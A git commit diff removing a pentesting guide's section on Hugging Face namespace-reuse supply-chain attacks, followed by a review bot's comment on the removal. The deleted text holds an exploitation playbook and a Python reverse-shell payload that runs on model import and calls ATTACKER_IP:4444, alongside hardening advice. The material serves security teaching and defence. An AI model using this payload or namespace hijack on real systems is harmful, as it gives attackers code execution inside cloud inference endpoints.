Update pentesting-cloud-methodology.md

SirBroccoli
2025-09-29 23:03:04 +02:00
committed by GitHub
parent 5b5e339f96
commit 89a2ab54ae


@@ -420,75 +420,6 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo
- [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
## AI/ML Model Registry Supply-Chain Attacks (Hugging Face Namespace Reuse)
A systemic weakness in how models are referenced and deployed can be abused across clouds and OSS: many pipelines resolve models by Author/ModelName (e.g., Hugging Face), without pinning to a specific commit or verifying integrity. If an author/org on Hugging Face is deleted, anyone can re-register the same author name and recreate the same ModelName, silently replacing what downstream systems pull when they resolve by name only. Transferred models can also be abused by breaking the old-path redirect if the old author is later deleted and re-registered by an attacker.
Key cases on Hugging Face hub:
- Ownership deletion: old Author/ModelName returns 404 until takeover by a new account that recreates the author and model.
- Ownership transfer: old Author/ModelName issues 307 to the new author; if the old author is later deleted and re-registered by an attacker, the legacy path resolves to attacker content.
Recognition heuristics (HTTP):
```bash
# Author existence
curl -I https://huggingface.co/<Author> # 200 exists, 404 deleted/available
# Legacy model path behavior
curl -I https://huggingface.co/<Author>/<ModelName> # 307 redirect (transfer) | 404 deleted until takeover
```
Exploitation playbook (abstract):
1) Identify reusable namespaces (deleted authors or transferred models whose old author was removed) still referenced by code, defaults, notebooks, docs, or cloud model catalogs.
2) Re-register the abandoned author on Hugging Face; recreate the same ModelName under that author.
3) Publish a malicious repo. Ensure model loader executes code on import (e.g., __init__.py side effects, custom modeling_*.py referenced by auto_map). Some loaders require trust_remote_code=True.
4) Rely on downstream systems that fetch by name only. When they deploy or from_pretrained("Author/ModelName"), the attackers code executes inside the target runtime (e.g., cloud inference endpoint container/VM) with that endpoints permissions.
Payload on load (example):
```python
# __init__.py or a module imported by model loader
import os, socket, subprocess, threading
def _rs(host, port):
s = socket.socket(); s.connect((host, port))
for fd in (0,1,2):
try:
os.dup2(s.fileno(), fd)
except Exception:
pass
subprocess.call(["/bin/sh","-i"]) # demo purposes only
# Gate on an env var if desired
if os.environ.get("INFERENCE_ENDPOINT","1") == "1":
threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()
```
Cloud platform impact and examples:
- Google Vertex AI Model Garden: direct deploy of HF models; hijacked namespaces can yield RCE in the endpoint container when the platform loads attacker repo code.
{{#ref}}
gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
{{#endref}}
- Microsoft Azure AI Foundry: Model Catalog includes HF models; hijacked namespaces can yield RCE in the deployed endpoint with that endpoints permissions.
{{#ref}}
azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md
{{#endref}}
Detection and hardening:
- Treat Author/ModelName like any third-party dependency. Continuously scan codebases, defaults, docstrings, comments, model cards, and notebooks for HF identifiers and resolve their current ownership.
- Pin to a specific commit in loaders to prevent silent replacement:
```python
from transformers import AutoModel
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")
```
- Clone vetted models to trusted internal registries/artifact stores and reference those in production.
- Before deploying from cloud model catalogs, verify the current author and provenance of the referenced HF model. Be aware that catalog verifications can drift if upstream authors are deleted/re-registered.
## Google
### GCP
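Review bot: The hunk header (`-420,75 +420,6`) shows this is a pure deletion of the "AI/ML Model Registry Supply-Chain Attacks (Hugging Face Namespace Reuse)" section, yet the commit message ("Update pentesting-cloud-methodology.md") gives no reason and no pointer to where the material went; the "Detection and hardening" bullets (pinning `revision="<COMMIT_HASH>"` in `AutoModel.from_pretrained`, mirroring vetted models into internal registries, and re-checking the current owner of every referenced `Author/ModelName`) are the part readers most need and are removed together with the rest. Suggest either stating in the commit message that the content now lives in the two `{{#ref}}` targets (`gcp-vertex-ai-post-exploitation.md`, `az-azure-ai-foundry-post-exploitation.md`) or keeping the hardening bullets in this file, since after the change the remaining context jumps straight from the awesome-cloud-sec link to the `## Google` heading with nothing on model-registry supply-chain risk. Dropping the inline reverse-shell "payload on load" sample from a methodology overview is reasonable; the HTTP recognition heuristics (`curl -I https://huggingface.co/<Author>` returning 200 vs 404, 307 on a transferred model path) are also useful as a detection check for defenders auditing their own dependencies and could be retained with the hardening notes.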